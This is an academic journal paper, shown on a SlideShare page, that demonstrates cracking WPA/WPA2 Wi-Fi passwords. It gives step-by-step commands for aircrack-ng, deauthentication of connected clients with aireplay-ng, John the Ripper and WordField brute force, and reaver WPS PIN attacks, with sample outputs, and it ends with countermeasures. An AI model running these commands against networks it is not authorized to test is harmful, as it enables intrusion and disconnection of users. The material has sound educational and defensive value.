SlideShare una empresa de Scribd logo
1 de 10
Descargar para leer sin conexión
ISSN: 2278 – 1323
           International Journal of Advanced Research in Computer Engineering & Technology
                                                               Volume 1, Issue 4, June 2012


    WPA Exploitation In The World Of Wireless
                    Network
  Pranav S. Ambavkar, Pranit U. Patil, Dr.B.B.Meshram, Prof. Pamu Kumar Swamy
                                           VJTI, Matunga, Mumbai, India.

                                             ambavkar.pranav@gmail.com

Abstract—Wifi device uses security authentication                that carry that name. IEEE 802.1X authentication
protocol even though they are having some weakness.              server uses, WPA, in which it provides different keys
Generally wep, wpa protocols are used for security               to each user. However, it can also be used in a less
purpose. This is already proved that WEP                         secure "pre-shared key" (PSK) mode.
authentication protocol is a weak protocol. By analyzing
weakness of wep the concept of WPA and WPA2
                                                                 Data is encrypted using the RC4 stream cipher, with
developed. In this paper, we will examine the weak-              a 128-bit key and a 48-bit initialization vector (IV).
nesses of “Strong WPA/WPA2 Authentication” and see               One major improvement in WPA over WEP is the
how easy it is to crack the protocol. We will take a look        Temporal Key Integrity Protocol (TKIP), which
at the new standard’s WPA and WPA2                               dynamically changes keys as the system is used. The
implementations along with their first minor                     factor Key recovery is possible in WEP was removed
vulnerabilities and how it is possible to crack it.              in WPA by adding large IV in algorithm.
Index Terms—WEP,WPA,WPA2,Aircrack-ng,John-the-
ripper,wordfield,reaver                                          WPA has highly secured payload integrity. The CRC
                                                                 used in WEP is not secured as it is possible to change
                 I.INTRODUCTION                                  CRC message during cracking even if WEP key is
                                                                 not known. A more secured algorithm named
WEP,WPA and WPA2 are the authentication                          Message Integrity Code (MIC) is used in WPA to
protocols are used for security of wireless network.             overcome WEP weaknesses. Frame counter
Researchers had found various weaknesses in WEP                  mechanism is used in MIC of WPA that prevents
old system .To overcome that its place is taken by               execution of repeated attacks.
WPA and WPA2.Today world says that WPA and
WPA2 are very strong protocols providing good                       C.WPA2 :
security. First we will see the brief history of
WEP,WPA and WPA2.
                                                                    There is very much similarities between
  A.WEP [1] :                                                    802.11i/WPA2 authentication security WPA, with a
                                                                 few differences. It uses AES based algorithm.At the
   WEP protocol was not developed by researchers or              end of the proposed 802.11i transition, AES
experts in security and cryptography. So weakness                encryption was put to use as hardware was upgraded
was not considered in all direction. The name David              to allow for the change.
Wagner proved RC4 vulnerable. In 2001, Scott
Fluhrer, Itsik Mantin and Adi Shamir published paper                       II. WPA/WPA2 WEAKNESSESS
on WEP, showing two vulnerabilities in the RC4
encryption algorithm: invariance weaknesses and                  Weaknesses of WPA/WPA2 has been discovered.
known Initialization Vector(IV) attacks. Both attacks
rely on the fact that for certain key values it is                  A. Weak password :
possible for bits in the initial bytes of the key stream
to depend on just a few bits of the encryption key. As
the encryption key is nothing but concatenation of                 If client is connected to access point using weak
secret key and IV, certain IV values yield weak keys.            password then password cracking attacks are
                                                                 possible. WPA uses a password for accessing. When
   B.WPA :                                                       device is connected to access point with WPA
  Wifi Protected Access (WPA) was created by the                 password, its encrypted form is pass over network
Wi-Fi Alliance, an industry trade group, which owns              which is catch by someone who is listening it.
the trademark to the Wi-Fi name and certifies devices            Catching the data is not an issue but if encrypted



                                                                                                                  609
                                            All Rights Reserved © 2012 IJARCET
ISSN: 2278 – 1323
          International Journal of Advanced Research in Computer Engineering & Technology
                                                              Volume 1, Issue 4, June 2012

password captured by cracker is weak, small then by                       Network card that supports packet
using dictionary attack cracking is possible.                             injection, such as TP-link TL-WN821N
                                                                          adapter with atheros chipset
  B. WPS PIN recovery[2] :
                                                                          Dell INSPIRON 4050 laptop’s internal
   One of the most serious weakness is found in                           Network card is not supporting packet
December 2011 by Stefan Viehbock that impact on                           injection function. So I am using TP-link
wireless access point with the Wi-Fi Protected Setup                      TL-WN821N adapter with atheros chipset. It
(WPS) feature, without knowing of which encryption                        shows wlan1 interface(Figure2).
method they use. Todays there are many routers
having this feature enabled by default. Wifi
manufacturer had find out a new alternative method
to eliminate weak password choices given by user.
The feature generates automatically strong password
and users should add their devices to desired
network. The router has pushing button on the
devices or entering an 8-digit PIN. The flaw in WPA
PIN allows attacker to recover of PIN.                                   Figure2: TP-link TL-WN821N adapter

    III. TOOLS NEEDED TO EXPLOIT WPA                                     Basic Linux networking skills and command
                                                                          line capabilities
       Blackbuntu operating system
       TP Link Access point whose wireless
        network encrypted with a WPA passphrase
        (Figure1)                                                                    IV.Attacks on WPA

                                                                   A. Aircrack-ng against WPA[3]:
                                                                   Step 1 : Put the interface in monitor mode. Prepare
                                                                to start dumping packets from targeted network.

                                                                "airmon-ng start wlan1" where wlan1 is your network
                                                                interface device. It enables wlan1 to monitor
                                                                mode(Figure3).




           Figure : TP Link Access point




                                                                                                                 610
                                           All Rights Reserved © 2012 IJARCET
ISSN: 2278 – 1323
          International Journal of Advanced Research in Computer Engineering & Technology
                                                              Volume 1, Issue 4, June 2012




                                            Figure3: airmon-ng start wlan1



Step 2 : Start capturing packets from targeted access           Beacon frames, Data packets, channel, Encryption,
point and be ready to deauthenticate a device                   cipher type and ESSID. After selecting network that
connected to desired access point(Figure4).                     we want to crack note down the BSSID and channel
                                                                number. Here I am going to crack access point whose
“airodump-ng mon0” wait for some time to load all               BSSID is F4:EC:38:BA:6C:44 and ESIID redot on
networks available in range of lan card. Enter Ctrl+C           channel 1.
to stop scanning. It will show all details about desired
access point. Such as connected BSSID, power,




                                                                                                               611
                                           All Rights Reserved © 2012 IJARCET
ISSN: 2278 – 1323
          International Journal of Advanced Research in Computer Engineering & Technology
                                                              Volume 1, Issue 4, June 2012

                                             Figure4: airodump-ng mon0

Step 3 : Monitor and store data passing through                 Assuming you still have a terminal window open
network                                                         dumping traffic, open a new terminal and
                                                                deauthenticate the victim from the target network.
airodump-ng     mon0      --channel      1 --bssid
F4:EC:38:BA:6C:44 -w reddot. The data being                     Aireplay-ng -o 4 -a F4:EC:38:BA:6C:44               -c
recorded and saved in reddot named file.                        90:4C:E5:B2:6F:D8 mon0

Step 4 : Deauthenticate the device connected to                 where "-0 4" tells aireplay to inject deauthentication
access point and force them to re exchange WPA                  packets (4 of them), "-a" is the wireless access point
key(Figure5)                                                    MAC address and "-c" is the client (victim) MAC
                                                                address.
It will provide the 4-way handshake for us, once they
are disconnected from the wireless access point.




                                                 Figure5: Aireplay-ng

A successful deauthentication attack will show                  Step 4 : Its time to confirm 4-way handshake is
ACKs, which indicates that the victim who is                    captured or not(Figure6) : Now that you
connected to the access point has acknowledged the              deauthenticated a client from the wireless network,
disconnect we just issued. It is possible to send just 1        that client will re-exchange the WPA key. Because
deauthentication request, but depending on the range            you have your terminal window still open and
of you to the target wireless network sometimes more            dumping traffic, you should have captured this
than 1 request is needed. We chose to inject a handful          handshake.
of deauthentication requests to ensure that the vicim
gets the message.




                                              Figure 6: 4-way handshake

Airodump will show the captured handshake in the                packet you need, you can close this window and
top right hand corner. Now that you captured the                proceed to break the WPA key.


                                                                                                                 612
                                           All Rights Reserved © 2012 IJARCET
ISSN: 2278 – 1323
          International Journal of Advanced Research in Computer Engineering & Technology
                                                              Volume 1, Issue 4, June 2012

Step 5 : To crack the password you need a file which           aircrack-ng -w /home/pranav/download/password.lst
contains list of password. Prepare your own                    –b F4:EC:38:BA:6C:44 /home/pranav/reddot-01.cap
dictionary which contains all possible passwords that
generally used. There are lot of dictionary files exits         where "-w" specifies the dictionary file to use.
on internet that can be used for demo cracking. Here I
Compiled a file password.lst. Knowing what your                This command will start trying the passwords listed
password is for your own network, compile a                    in the dictionary file that you provided until it finds a
dictionary file and include the real password                  match. If the password wasn’t found then you need to
somewhere in the middle.                                       use a better dictionary file. It is possible that the
                                                               password can not be found at all in case it was long
                                                               and complex enough! But in case there was a match
                                                               then you should see something like :

Step 6 : Cracking the WPA key using aircrack-ng,
dictionary file and 4-way handshake captured file
redot.cap(Figure7)




                                                Figure7: aircrack-ng

The WPA or WPA2 password is what you see
besides “KEY FOUND!” inside the brackets                       Step 1 : airmon-ng start wlan1

                                                               Step 2 : airodump-ng mon0

  B.Crack WPA/WPA2-PSK with John the Ripper                    Step 3 : airodump-ng --channel 7 --write output --
[4]:                                                           bssid 00:17:9A:82:44:1B mon0
  At the moment, we need to use dictionaries to
brute force the WPA/WPA-PSK. To crack                          Step 4: aireplay-ng --deauth 4 -a 00:17:9A:82:44:1B -
WPA/WPA2-PSK requires the to be cracked key is in              c 90:4C:E5:B2:6F:D8 mon0
your dictionaries. I have a better solution to crack
WPA/WPA2-PSK. Suppose the wifi channel is 5, the               Step5: /pentest/password/john-
BSSID MAC is 00:17:9A:82:44:1B and the client                  1.7.6.jumbo12/run/john -stdout -incremantal:all |
MAC is 90:4C:E5:B2:6F:D8. Make sure the client is              aircrack-ng –b 00:17:9A:82:44:1B -w -
connecting        to      the      wifi       router.          /home/pranav/test-01.cap(Figure8)




                                                                                                                   613
                                          All Rights Reserved © 2012 IJARCET
ISSN: 2278 – 1323
          International Journal of Advanced Research in Computer Engineering & Technology
                                                              Volume 1, Issue 4, June 2012




                                         Figure8: John the Ripper output
You are required to wait for hours or years for the          So running "wordfield -a -n 8 8" will output all
cracking which is depends on how powerful your               possible alphanumeric strings which are 8 characters
hardwares are and strength of the key.                       long. I will be using the output from this tool as the
                                                             input for aircrack-ng.
   C.Cracking WPA Without a Dictionary (Aircrack-
ng + WordField)[5] :                                         When a 4 way handshake has been saved with
                                                             airodump-ng, the wpa network is now ready to crack.
   Instead of using a dictionary on a WPA encrypted          This is usually where a dictionary attack will be
network, we can perform a bruteforce attack. For key         launched. But using this method, the dictionary will
generation I will use a tool called WordField, which         be generated in realtime against cracking the wpa
can be found here.By using this tool we can crack            key.
key using bruteforce attack.
                                                             This is the command to do this,
Usage of this tool is very simple :
                                                             wordfield -a -n 8 8 | aircrack-ng –b
wordfield [OPTION...] MINLENGTH                              00:17:9A:82:44:1B -w - /home/pranav/Wifire-
[MAXLENGTH]                                                  02.cap(Figure9)




                                                                                                              614
                                         All Rights Reserved © 2012 IJARCET
ISSN: 2278 – 1323
          International Journal of Advanced Research in Computer Engineering & Technology
                                                              Volume 1, Issue 4, June 2012




                                             Figure 9: WordField output

This will pipe the output from wordfield into                  Using the terminal:
aircrack-ng. Also, please note that this is only really
effective on weak keys, unless you have a lot of               1. Download aircrack-ng : sudo apt-get install
computational power. When I set a WPA key                      aircrack-ng
aabbccdd it took 22 hours 7 minutes and 35
seconds.When tried for aaaabbbb took 2 minutes and             2. Put Wifi adapter into monitor mode : sudo airmon-
6 seconds. So cracking using wordfield depend upon             ng start wlan1
your laptops processor speed and how much key is
complicated as it tries all possible permutation               3. Use airodump-ng to scan for WPA/WPA2
combination.                                                   encrypted network BSSIDs : sudo airodump-ng mon0

  D. How to crack WPA/WPA2 without a dictionary                The BSSIDs are listed on the left, these are the IDs
using reaver[6]:                                               for the various surrounding networks. Pick one which
                                                               is WPA/WPA2 and uses a Public Shared Key (PSK).
   The security of WPA/WPA2 network encryption is              Don't close this terminal, open up a new terminal and
now over. It no longer takes decades to crack. Their           use                                             this.
brilliant team have found a weakness in WPA that               4. Use wash command as shown in Figure10 to scan
lets an attacker bruteforce against Wifi Protected             wps pin enabled nearest access points : sudo wash –i
Setup (WPS) PINS in order to then recover the                  mon0
WPA/WPA2 key. We'll be using a tool which
exploits this bug called reaver.
I will take you through how this is done on a Linux
machine




                                                                                                               615
                                          All Rights Reserved © 2012 IJARCET
ISSN: 2278 – 1323
         International Journal of Advanced Research in Computer Engineering & Technology
                                                             Volume 1, Issue 4, June 2012




                                 Figure10:Nearest wps supporting Access Points

5.     sudo     reaver      -i        mon0        -b         -b "BSSID" = the router to crack.
F4:EC:38:BA:6C:44(Figure11)

-i mon0 = use the mon0 interface which is your wifi
adapter in monitor mode.




                                             Figure11:Reaver attack
                                                                                                 616
                                        All Rights Reserved © 2012 IJARCET
ISSN: 2278 – 1323
          International Journal of Advanced Research in Computer Engineering & Technology
                                                              Volume 1, Issue 4, June 2012

6. Now wait from around hours as it cracks the                 set a WPA key “Game0nBitch” combination of
network key! It cracks a numeric WPS key in all                alphanumeric key it took 16 hours 58 minutes and 25
possible ways and took less time as it tries all               seconds to crack.(Figure 12)
permutation combination for a numeric pin. When I




                                     Figure 12:WPA Exploitation using Reaver

                 V. CONCLUSION                                 [2]http://en.wikipedia.org/wiki/Wi-
                                                               Fi_Protected_Access#WPS_PIN_recovery
In this paper we learned WEP,WPA,WPA2
authentication protocols. Weak passwords and WPS               [3]https://sites.google.com/site/clickdeathsquad/Hom
Pin are the main flaws in authentication. We have              e/cds-wpacrack
seen two types of dictionary attack aircrack-ng, john-
                                                               [4]http://samiux.blogspot.in/2010/04/howto-crack-
the-ripper if the password is weak and two types of
                                                               wpawpa2-psk-with-john.html
Brute force attack wordfield and reaver if WPS PIN
enabled router is in network. We have good                     [5]http://www.zer0trusion.com/2011/09/cracking-
knowledge of how crackers can attack wireless                  wpa-without-dictionary.html
networks that use weak WPA / WPA2 keys and the
simple countermeasures that you can take to ensure             [6]http://www.zer0trusion.com
that it doesn't happen to you. With a strong, long,
complex key, disabling WPS PIN and good security
practices, a wireless LAN secured by WPA / WPA2
is definitely not an easy target.

                   REFERENCES

[1]Wi-Fi security – WEP, WPA and WPA2
Guillaume Lehembre
                                                                                                               617
                                          All Rights Reserved © 2012 IJARCET
ISSN: 2278 – 1323
      International Journal of Advanced Research in Computer Engineering & Technology
                                                          Volume 1, Issue 4, June 2012




AUTHERS PROFILE :                                         technical education and technology education .



Pranav S. Ambavkar is a student of VJTI
Matunga, Mumbai. He did his B.Tech. I.T.
degree from Dr.B.A.T.university. He has
published three papers. He has work
experience as a software engineer in INFOSYS
and Lecturer at Rajendra Mane College of
Engineering.

Pranit Patil is a student of VJTI Matunga,
Mumbai. He did his B.Tech. Computer. degree
from Dr.B.A.T.university. He has published
three papers.

                        Dr. B. B. Meshram is
                        working as Professor in
Computer Technology Dept., VJTI, Matunga,
                        Mumbai. He is Ph.D.
                        in            Computer
                        Engineering and has
                        published international
                        journal is 25, National
                        journal       is      1,
                                   international
                        conference is 70 and
national conference 39 papers to his credit. He
has taught various subjects such as Object
Oriented Software Engg., Network Security,
Advanced Databases, Advanced Computer
Network (TCP/IP), Data warehouse and Data
mining, etc at Post Graduate Level. He has
guided several projects at graduate and post
graduate level. He is the life member of CSI
and Institute of Engineers etc

Mr. Pamu Kumar Swamy has done M.E. in I.T.
degree ,B.E. in Electronics degree BSc in
Physics. Over 20 years of experience in
Information    Technology        Infrastructure
management (IMS) as principal
                      technical consultant for
                      major commercial open
                      systems     and     open
                      source systems, data
                      storage,
LAN/WAN/WLAN networks, IT security ,
                                                                                                           618
                                     All Rights Reserved © 2012 IJARCET

Más contenido relacionado

La actualidad más candente

Hacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonHacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonOWASP Delhi
 
Security Issues of 802.11b
Security Issues of 802.11bSecurity Issues of 802.11b
Security Issues of 802.11bguestd7b627
 
Security Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSecurity Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSreekanth GS
 
Security Delivery Platform: Best practices
Security Delivery Platform: Best practicesSecurity Delivery Platform: Best practices
Security Delivery Platform: Best practicesMihajlo Prerad
 
A LIGHT WEIGHT SOLUTION FOR DETECTING DE-AUTHENTICATION ATTACK
A LIGHT WEIGHT SOLUTION FOR DETECTING DE-AUTHENTICATION ATTACK A LIGHT WEIGHT SOLUTION FOR DETECTING DE-AUTHENTICATION ATTACK
A LIGHT WEIGHT SOLUTION FOR DETECTING DE-AUTHENTICATION ATTACK IJNSA Journal
 
Understanding WiFi Security Vulnerabilities and Solutions
Understanding WiFi Security Vulnerabilities and SolutionsUnderstanding WiFi Security Vulnerabilities and Solutions
Understanding WiFi Security Vulnerabilities and SolutionsAirTight Networks
 
Antony's Final Draft v7
Antony's Final Draft v7Antony's Final Draft v7
Antony's Final Draft v7Antony Law
 
Linux Security Quick Reference Guide
Linux Security Quick Reference GuideLinux Security Quick Reference Guide
Linux Security Quick Reference Guidewensheng wei
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Securityamiable_indian
 
How To Hack Wireless Internet Connections
How To Hack Wireless Internet ConnectionsHow To Hack Wireless Internet Connections
How To Hack Wireless Internet Connectionsguest85e156e
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!edwardo
 
How to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngHow to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngOpen Knowledge Nepal
 
Day3 Backup
Day3 BackupDay3 Backup
Day3 BackupJai4uk
 

La actualidad más candente (19)

WPA/WPA2 TKIP Exploit
WPA/WPA2 TKIP ExploitWPA/WPA2 TKIP Exploit
WPA/WPA2 TKIP Exploit
 
Wireless Security
Wireless SecurityWireless Security
Wireless Security
 
Hacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonHacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh Jadon
 
Security Issues of 802.11b
Security Issues of 802.11bSecurity Issues of 802.11b
Security Issues of 802.11b
 
Security Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSecurity Issues of IEEE 802.11b
Security Issues of IEEE 802.11b
 
Cn36539543
Cn36539543Cn36539543
Cn36539543
 
woot15-paper-novella
woot15-paper-novellawoot15-paper-novella
woot15-paper-novella
 
Security Delivery Platform: Best practices
Security Delivery Platform: Best practicesSecurity Delivery Platform: Best practices
Security Delivery Platform: Best practices
 
A LIGHT WEIGHT SOLUTION FOR DETECTING DE-AUTHENTICATION ATTACK
A LIGHT WEIGHT SOLUTION FOR DETECTING DE-AUTHENTICATION ATTACK A LIGHT WEIGHT SOLUTION FOR DETECTING DE-AUTHENTICATION ATTACK
A LIGHT WEIGHT SOLUTION FOR DETECTING DE-AUTHENTICATION ATTACK
 
Resilience in the ZigBee Residential Mode
Resilience in the ZigBee Residential ModeResilience in the ZigBee Residential Mode
Resilience in the ZigBee Residential Mode
 
By25450453
By25450453By25450453
By25450453
 
Understanding WiFi Security Vulnerabilities and Solutions
Understanding WiFi Security Vulnerabilities and SolutionsUnderstanding WiFi Security Vulnerabilities and Solutions
Understanding WiFi Security Vulnerabilities and Solutions
 
Antony's Final Draft v7
Antony's Final Draft v7Antony's Final Draft v7
Antony's Final Draft v7
 
Linux Security Quick Reference Guide
Linux Security Quick Reference GuideLinux Security Quick Reference Guide
Linux Security Quick Reference Guide
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Security
 
How To Hack Wireless Internet Connections
How To Hack Wireless Internet ConnectionsHow To Hack Wireless Internet Connections
How To Hack Wireless Internet Connections
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!
 
How to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngHow to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ng
 
Day3 Backup
Day3 BackupDay3 Backup
Day3 Backup
 

Destacado

Дифференциальное измерение эмоциональности c помощью алгоритма PMI-IR
Дифференциальное измерение эмоциональности c помощью алгоритма PMI-IRДифференциальное измерение эмоциональности c помощью алгоритма PMI-IR
Дифференциальное измерение эмоциональности c помощью алгоритма PMI-IRАндрей Четвериков
 
Contribution to provide QoS over Mobile Ad Hoc Networks for Video-Streaming S...
Contribution to provide QoS over Mobile Ad Hoc Networks for Video-Streaming S...Contribution to provide QoS over Mobile Ad Hoc Networks for Video-Streaming S...
Contribution to provide QoS over Mobile Ad Hoc Networks for Video-Streaming S...vicovision
 
Types Of Computer Systems
Types Of Computer SystemsTypes Of Computer Systems
Types Of Computer SystemsmBlackwell
 
Ayuno Agradable A Dios...
Ayuno Agradable A Dios...Ayuno Agradable A Dios...
Ayuno Agradable A Dios...Mundy Labarca
 
Computer Apps 1 Slide Show
Computer Apps 1 Slide ShowComputer Apps 1 Slide Show
Computer Apps 1 Slide ShowJosh Mathew
 
Athletes in Service (Final JUA Project)
Athletes in Service (Final JUA Project)Athletes in Service (Final JUA Project)
Athletes in Service (Final JUA Project)Hans Mundahl
 
Electronic Communication Investigate
Electronic Communication InvestigateElectronic Communication Investigate
Electronic Communication InvestigateMegan Hoerauf
 
Carta Al Inquilino 1(2)
Carta Al Inquilino 1(2)Carta Al Inquilino 1(2)
Carta Al Inquilino 1(2)Mundy Labarca
 

Destacado (20)

Union Du Peuple Congolais
Union Du Peuple CongolaisUnion Du Peuple Congolais
Union Du Peuple Congolais
 
Дифференциальное измерение эмоциональности c помощью алгоритма PMI-IR
Дифференциальное измерение эмоциональности c помощью алгоритма PMI-IRДифференциальное измерение эмоциональности c помощью алгоритма PMI-IR
Дифференциальное измерение эмоциональности c помощью алгоритма PMI-IR
 
What is CanadaHelps and why should my charity register?
What is CanadaHelps and why should my charity register?What is CanadaHelps and why should my charity register?
What is CanadaHelps and why should my charity register?
 
Contribution to provide QoS over Mobile Ad Hoc Networks for Video-Streaming S...
Contribution to provide QoS over Mobile Ad Hoc Networks for Video-Streaming S...Contribution to provide QoS over Mobile Ad Hoc Networks for Video-Streaming S...
Contribution to provide QoS over Mobile Ad Hoc Networks for Video-Streaming S...
 
353 357
353 357353 357
353 357
 
Types Of Computer Systems
Types Of Computer SystemsTypes Of Computer Systems
Types Of Computer Systems
 
Ayuno Agradable A Dios...
Ayuno Agradable A Dios...Ayuno Agradable A Dios...
Ayuno Agradable A Dios...
 
Computer Apps 1 Slide Show
Computer Apps 1 Slide ShowComputer Apps 1 Slide Show
Computer Apps 1 Slide Show
 
Athletes in Service (Final JUA Project)
Athletes in Service (Final JUA Project)Athletes in Service (Final JUA Project)
Athletes in Service (Final JUA Project)
 
661 665
661 665661 665
661 665
 
Electronic Communication Investigate
Electronic Communication InvestigateElectronic Communication Investigate
Electronic Communication Investigate
 
135 139
135 139135 139
135 139
 
315 319
315 319315 319
315 319
 
530 535
530 535530 535
530 535
 
382 387
382 387382 387
382 387
 
Pdf5
Pdf5Pdf5
Pdf5
 
22 27
22 2722 27
22 27
 
Carta Al Inquilino 1(2)
Carta Al Inquilino 1(2)Carta Al Inquilino 1(2)
Carta Al Inquilino 1(2)
 
352 356
352 356352 356
352 356
 
Pdf7
Pdf7Pdf7
Pdf7
 

Similar a 609 618

Viable means using which Wireless Network Security can be Jeopardized
Viable means using which Wireless Network Security can be JeopardizedViable means using which Wireless Network Security can be Jeopardized
Viable means using which Wireless Network Security can be JeopardizedIRJET Journal
 
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless Networks
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless NetworksLiving in the Jungle: Legitimate users in Legitimate Insecure Wireless Networks
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless NetworksChema Alonso
 
chapter 7 -wireless network security.ppt
chapter 7  -wireless network security.pptchapter 7  -wireless network security.ppt
chapter 7 -wireless network security.pptabenimelos
 
Pentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 IssuePentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 IssueIshan Girdhar
 
Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018Mohammad Fareed
 
WLAN Attacks and Protection
WLAN Attacks and ProtectionWLAN Attacks and Protection
WLAN Attacks and ProtectionChandrak Trivedi
 
Wireless Device and Network level security
Wireless Device and Network level securityWireless Device and Network level security
Wireless Device and Network level securityChetan Kumar S
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hackingMihir Shah
 
Wi fi protected-access
Wi fi protected-accessWi fi protected-access
Wi fi protected-accessbhanu4ugood1
 
Module 6 Wireless Network security
Module 6  Wireless Network securityModule 6  Wireless Network security
Module 6 Wireless Network securitynikshaikh786
 
A comparitive analysis of wireless security protocols (wep and wpa2)
A comparitive analysis of wireless security protocols (wep and wpa2)A comparitive analysis of wireless security protocols (wep and wpa2)
A comparitive analysis of wireless security protocols (wep and wpa2)pijans
 
Wi fi protected access
Wi fi protected accessWi fi protected access
Wi fi protected accessLopamudra Das
 
Wireless network security
Wireless network securityWireless network security
Wireless network securityVishal Agarwal
 
Describe the primary differences between WEP, WPA, and WPA2 protocol.pdf
Describe the primary differences between WEP, WPA, and WPA2 protocol.pdfDescribe the primary differences between WEP, WPA, and WPA2 protocol.pdf
Describe the primary differences between WEP, WPA, and WPA2 protocol.pdfrajkumarm401
 

Similar a 609 618 (20)

Pdf3
Pdf3Pdf3
Pdf3
 
Wifi Security
Wifi SecurityWifi Security
Wifi Security
 
Viable means using which Wireless Network Security can be Jeopardized
Viable means using which Wireless Network Security can be JeopardizedViable means using which Wireless Network Security can be Jeopardized
Viable means using which Wireless Network Security can be Jeopardized
 
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless Networks
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless NetworksLiving in the Jungle: Legitimate users in Legitimate Insecure Wireless Networks
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless Networks
 
chapter 7 -wireless network security.ppt
chapter 7  -wireless network security.pptchapter 7  -wireless network security.ppt
chapter 7 -wireless network security.ppt
 
Pentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 IssuePentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 Issue
 
Network security
Network securityNetwork security
Network security
 
Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018
 
WLAN Attacks and Protection
WLAN Attacks and ProtectionWLAN Attacks and Protection
WLAN Attacks and Protection
 
Wireless Device and Network level security
Wireless Device and Network level securityWireless Device and Network level security
Wireless Device and Network level security
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
 
Shashank wireless lans security
Shashank wireless lans securityShashank wireless lans security
Shashank wireless lans security
 
Wi fi protected-access
Wi fi protected-accessWi fi protected-access
Wi fi protected-access
 
Module 6 Wireless Network security
Module 6  Wireless Network securityModule 6  Wireless Network security
Module 6 Wireless Network security
 
A comparitive analysis of wireless security protocols (wep and wpa2)
A comparitive analysis of wireless security protocols (wep and wpa2)A comparitive analysis of wireless security protocols (wep and wpa2)
A comparitive analysis of wireless security protocols (wep and wpa2)
 
Wi fi protected access
Wi fi protected accessWi fi protected access
Wi fi protected access
 
WPA 3
WPA 3WPA 3
WPA 3
 
Wireless network security
Wireless network securityWireless network security
Wireless network security
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
 
Describe the primary differences between WEP, WPA, and WPA2 protocol.pdf
Describe the primary differences between WEP, WPA, and WPA2 protocol.pdfDescribe the primary differences between WEP, WPA, and WPA2 protocol.pdf
Describe the primary differences between WEP, WPA, and WPA2 protocol.pdf
 

Más de Editor IJARCET

Electrically small antennas: The art of miniaturization
Electrically small antennas: The art of miniaturizationElectrically small antennas: The art of miniaturization
Electrically small antennas: The art of miniaturizationEditor IJARCET
 
Volume 2-issue-6-2205-2207
Volume 2-issue-6-2205-2207Volume 2-issue-6-2205-2207
Volume 2-issue-6-2205-2207Editor IJARCET
 
Volume 2-issue-6-2195-2199
Volume 2-issue-6-2195-2199Volume 2-issue-6-2195-2199
Volume 2-issue-6-2195-2199Editor IJARCET
 
Volume 2-issue-6-2200-2204
Volume 2-issue-6-2200-2204Volume 2-issue-6-2200-2204
Volume 2-issue-6-2200-2204Editor IJARCET
 
Volume 2-issue-6-2190-2194
Volume 2-issue-6-2190-2194Volume 2-issue-6-2190-2194
Volume 2-issue-6-2190-2194Editor IJARCET
 
Volume 2-issue-6-2186-2189
Volume 2-issue-6-2186-2189Volume 2-issue-6-2186-2189
Volume 2-issue-6-2186-2189Editor IJARCET
 
Volume 2-issue-6-2177-2185
Volume 2-issue-6-2177-2185Volume 2-issue-6-2177-2185
Volume 2-issue-6-2177-2185Editor IJARCET
 
Volume 2-issue-6-2173-2176
Volume 2-issue-6-2173-2176Volume 2-issue-6-2173-2176
Volume 2-issue-6-2173-2176Editor IJARCET
 
Volume 2-issue-6-2165-2172
Volume 2-issue-6-2165-2172Volume 2-issue-6-2165-2172
Volume 2-issue-6-2165-2172Editor IJARCET
 
Volume 2-issue-6-2159-2164
Volume 2-issue-6-2159-2164Volume 2-issue-6-2159-2164
Volume 2-issue-6-2159-2164Editor IJARCET
 
Volume 2-issue-6-2155-2158
Volume 2-issue-6-2155-2158Volume 2-issue-6-2155-2158
Volume 2-issue-6-2155-2158Editor IJARCET
 
Volume 2-issue-6-2148-2154
Volume 2-issue-6-2148-2154Volume 2-issue-6-2148-2154
Volume 2-issue-6-2148-2154Editor IJARCET
 
Volume 2-issue-6-2143-2147
Volume 2-issue-6-2143-2147Volume 2-issue-6-2143-2147
Volume 2-issue-6-2143-2147Editor IJARCET
 
Volume 2-issue-6-2119-2124
Volume 2-issue-6-2119-2124Volume 2-issue-6-2119-2124
Volume 2-issue-6-2119-2124Editor IJARCET
 
Volume 2-issue-6-2139-2142
Volume 2-issue-6-2139-2142Volume 2-issue-6-2139-2142
Volume 2-issue-6-2139-2142Editor IJARCET
 
Volume 2-issue-6-2130-2138
